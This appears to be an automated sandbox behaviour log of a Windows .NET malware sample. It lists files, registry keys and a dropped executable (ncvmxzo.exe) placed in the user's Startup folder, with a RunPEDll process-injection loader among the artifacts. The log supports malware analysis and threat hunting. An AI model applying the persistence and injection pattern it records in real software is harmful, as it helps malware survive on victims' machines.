C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe
\Device\NamedPipe\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2188.30070609
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2188.30070609
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2188.30070687
C:\Windows\System32\Branding\Basebrd\Basebrd.dll
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe"
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe.Local\
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\Seven01\AppData\Roaming\Microsoft
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.INI
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\ncvmxzoureascvnz.txt
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2440.30072531
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2440.30072531
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2440.30072531
C:\Users\Seven01\AppData\Local\Temp\reg.*
C:\Users\Seven01\AppData\Local\Temp\reg
C:\ProgramData\Oracle\Java\javapath\reg.*
C:\ProgramData\Oracle\Java\javapath\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\fb.exe.config
C:\Users\Seven01\AppData\Local\Temp\fb.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
\Device\NamedPipe\
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

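Write Files

Note: ncvmxzo.exe is written into the per-user Startup folder, whose contents Windows launches at each logon of that user; treat this file as the persistence artifact when hunting or cleaning up.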

C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe
C:\Users\Seven01\AppData\Local\Temp\ncvmxzoureascvnz.txt

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2188.30070609
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2188.30070609
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2188.30070687
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2440.30072531
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2440.30072531
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2440.30072531

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fb.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\683bcd0c\3496b50d
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
